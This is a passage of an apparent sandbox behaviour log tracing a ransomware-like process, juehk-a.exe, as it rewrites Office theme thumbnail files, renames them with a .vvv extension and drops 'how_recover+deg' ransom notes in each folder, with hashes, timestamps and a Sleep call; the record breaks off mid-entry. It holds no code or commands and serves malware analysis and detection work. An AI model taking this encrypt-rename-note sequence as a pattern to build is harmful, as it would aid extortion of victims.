- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521294
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83590
- mode: open
- sequenceNumber: 1493
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CASCADE\THMBNAIL.PNG
- filesize: 20371
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499618
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83624
- mode: close
- sequenceNumber: 1494
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CASCADE\THMBNAIL.PNG
- filesize: 20798
- md5sum: 68296a4a2b02be75fb2f54bdbe3d8a9b
- sha1sum: 0b50e19d998a5e047630975f957397a58c655d88
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499618
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83640
- mode: rename
- sequenceNumber: 1495
- filesize: 20798
- md5sum: 68296a4a2b02be75fb2f54bdbe3d8a9b
- sha1sum: 0b50e19d998a5e047630975f957397a58c655d88
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CASCADE\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CASCADE\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499618
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83649
- mode: created
- sequenceNumber: 1496
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CASCADE\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521295
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83656
- mode: close
- sequenceNumber: 1497
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CASCADE\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521295
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83664
- mode: created
- sequenceNumber: 1498
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CASCADE\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521296
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83671
- mode: close
- sequenceNumber: 1499
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CASCADE\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521296
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83679
- mode: open
- sequenceNumber: 1500
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\COMPASS\THMBNAIL.PNG
- filesize: 20575
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499619
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83770
- mode: close
- sequenceNumber: 1501
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\COMPASS\THMBNAIL.PNG
- filesize: 20990
- md5sum: 607cfa77211346e27fd95ce64b33adc3
- sha1sum: e98d50071133d5f714ee0daa6eaa79557f6fa39a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499619
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83815
- mode: rename
- sequenceNumber: 1502
- filesize: 20990
- md5sum: 607cfa77211346e27fd95ce64b33adc3
- sha1sum: e98d50071133d5f714ee0daa6eaa79557f6fa39a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\COMPASS\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\COMPASS\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499619
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83830
- mode: created
- sequenceNumber: 1503
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\COMPASS\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521297
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83836
- mode: close
- sequenceNumber: 1504
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\COMPASS\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521297
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83843
- mode: created
- sequenceNumber: 1505
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\COMPASS\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521298
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83850
- mode: close
- sequenceNumber: 1506
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\COMPASS\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521298
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83862
- mode: open
- sequenceNumber: 1507
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CONCRETE\THMBNAIL.PNG
- filesize: 28595
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499620
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83906
- mode: close
- sequenceNumber: 1508
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CONCRETE\THMBNAIL.PNG
- filesize: 29022
- md5sum: 4a330121b7775a1e46c3bdbccd5d5976
- sha1sum: d17df933b7883c8cfe92b5a0aff964df54fd113a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499620
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83915
- mode: rename
- sequenceNumber: 1509
- filesize: 29022
- md5sum: 4a330121b7775a1e46c3bdbccd5d5976
- sha1sum: d17df933b7883c8cfe92b5a0aff964df54fd113a
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CONCRETE\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CONCRETE\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499620
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83929
- mode: created
- sequenceNumber: 1510
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CONCRETE\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521299
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83936
- mode: close
- sequenceNumber: 1511
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CONCRETE\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521299
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83950
- mode: created
- sequenceNumber: 1512
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CONCRETE\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521300
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 83955
- mode: close
- sequenceNumber: 1513
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\CONCRETE\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521300
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 83960
- mode: open
- sequenceNumber: 1514
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\DEEPBLUE\THMBNAIL.PNG
- filesize: 33277
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499621
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84032
- mode: close
- sequenceNumber: 1515
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\DEEPBLUE\THMBNAIL.PNG
- filesize: 33694
- md5sum: d6e344f5fd643096eb36c064ad7d4f4d
- sha1sum: 9ec3a098d6d9bfbefc4aa3b242c034d2b251a2b4
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499621
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84045
- mode: rename
- sequenceNumber: 1516
- filesize: 33694
- md5sum: d6e344f5fd643096eb36c064ad7d4f4d
- sha1sum: 9ec3a098d6d9bfbefc4aa3b242c034d2b251a2b4
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\DEEPBLUE\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\DEEPBLUE\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499621
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84054
- mode: created
- sequenceNumber: 1517
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\DEEPBLUE\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906941155
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84061
- mode: close
- sequenceNumber: 1518
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\DEEPBLUE\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 1125899906941155
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84070
- mode: created
- sequenceNumber: 1519
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\DEEPBLUE\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521301
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84077
- mode: close
- sequenceNumber: 1520
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\DEEPBLUE\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521301
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84177
- mode: open
- sequenceNumber: 1521
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECHO\THMBNAIL.PNG
- filesize: 25106
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499622
- ntstatus: 0x0
- CreateOptions: 0x60
- high_cpu:
- timestamp: 84256
- sequenceNumber: 1522
- total_cpu: 78.676329185520359
- processinfo:
- tainted: true
- pid: 2312
- process_cpu: 78.676329185520359
- imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- file:
- timestamp: 84387
- mode: close
- sequenceNumber: 1523
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECHO\THMBNAIL.PNG
- filesize: 25534
- md5sum: adceff70d845e14fd70991c5869ae8b1
- sha1sum: ee3b020bedb44658451ff11902fc6637c4728b33
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499622
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84405
- mode: rename
- sequenceNumber: 1524
- filesize: 25534
- md5sum: adceff70d845e14fd70991c5869ae8b1
- sha1sum: ee3b020bedb44658451ff11902fc6637c4728b33
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECHO\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECHO\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499622
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84424
- mode: created
- sequenceNumber: 1525
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECHO\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521302
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84430
- mode: close
- sequenceNumber: 1526
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECHO\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521302
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84439
- mode: created
- sequenceNumber: 1527
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECHO\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521303
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84444
- mode: close
- sequenceNumber: 1528
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECHO\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521303
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84452
- mode: open
- sequenceNumber: 1529
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECLIPSE\THMBNAIL.PNG
- filesize: 32403
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499623
- ntstatus: 0x0
- CreateOptions: 0x60
- apicall:
- timestamp: 84667
- repeat: 6000
- sequenceNumber: 1530
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- dllname: kernel32.dll
- apiname: Sleep
- address: 0x0041ed5b
- file:
- timestamp: 84770
- mode: close
- sequenceNumber: 1531
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECLIPSE\THMBNAIL.PNG
- filesize: 32830
- md5sum: 952616ee19f2c191a29c4ea0ddb35be8
- sha1sum: 9b0c9c14eaf9470e38f13e1632e314f4e5f779fc
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499623
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84778
- mode: rename
- sequenceNumber: 1532
- filesize: 32830
- md5sum: 952616ee19f2c191a29c4ea0ddb35be8
- sha1sum: 9b0c9c14eaf9470e38f13e1632e314f4e5f779fc
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECLIPSE\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECLIPSE\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499623
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84785
- mode: created
- sequenceNumber: 1533
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECLIPSE\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521304
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84791
- mode: close
- sequenceNumber: 1534
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECLIPSE\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521304
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84798
- mode: created
- sequenceNumber: 1535
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECLIPSE\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521305
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84804
- mode: close
- sequenceNumber: 1536
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\ECLIPSE\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521305
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84810
- mode: open
- sequenceNumber: 1537
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EDGE\THMBNAIL.PNG
- filesize: 26402
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499624
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84819
- mode: close
- sequenceNumber: 1538
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EDGE\THMBNAIL.PNG
- filesize: 26830
- md5sum: 39b59588e6a4fabed96de52ea74efde3
- sha1sum: f4c682ad9aaa2f27109082283caeaa53819c24da
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499624
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84847
- mode: rename
- sequenceNumber: 1539
- filesize: 26830
- md5sum: 39b59588e6a4fabed96de52ea74efde3
- sha1sum: f4c682ad9aaa2f27109082283caeaa53819c24da
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EDGE\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EDGE\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499624
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84863
- mode: created
- sequenceNumber: 1540
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EDGE\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 2533274790494413
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84869
- mode: close
- sequenceNumber: 1541
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EDGE\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 2533274790494413
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84875
- mode: created
- sequenceNumber: 1542
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EDGE\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521306
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84880
- mode: close
- sequenceNumber: 1543
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EDGE\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521306
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84889
- mode: open
- sequenceNumber: 1544
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EVRGREEN\THMBNAIL.PNG
- filesize: 32433
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499625
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84920
- mode: close
- sequenceNumber: 1545
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EVRGREEN\THMBNAIL.PNG
- filesize: 32862
- md5sum: fd786df1c118c1ff73ce750e31ff2ceb
- sha1sum: 14f4a05666e4e014ec425a97152074f7684dba05
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499625
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84938
- mode: rename
- sequenceNumber: 1546
- filesize: 32862
- md5sum: fd786df1c118c1ff73ce750e31ff2ceb
- sha1sum: 14f4a05666e4e014ec425a97152074f7684dba05
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EVRGREEN\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EVRGREEN\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499625
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84952
- mode: created
- sequenceNumber: 1547
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EVRGREEN\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521307
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84958
- mode: close
- sequenceNumber: 1548
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EVRGREEN\how_recover+deg.txt
- filesize: 2673
- md5sum: 615f474c617565cfb0f97ab42bfbf98b
- sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521307
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 84977
- mode: created
- sequenceNumber: 1549
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EVRGREEN\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521308
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 84983
- mode: close
- sequenceNumber: 1550
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\EVRGREEN\how_recover+deg.html
- filesize: 9480
- md5sum: a68c3caf0be8f1a393c697136926cfd4
- sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521308
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
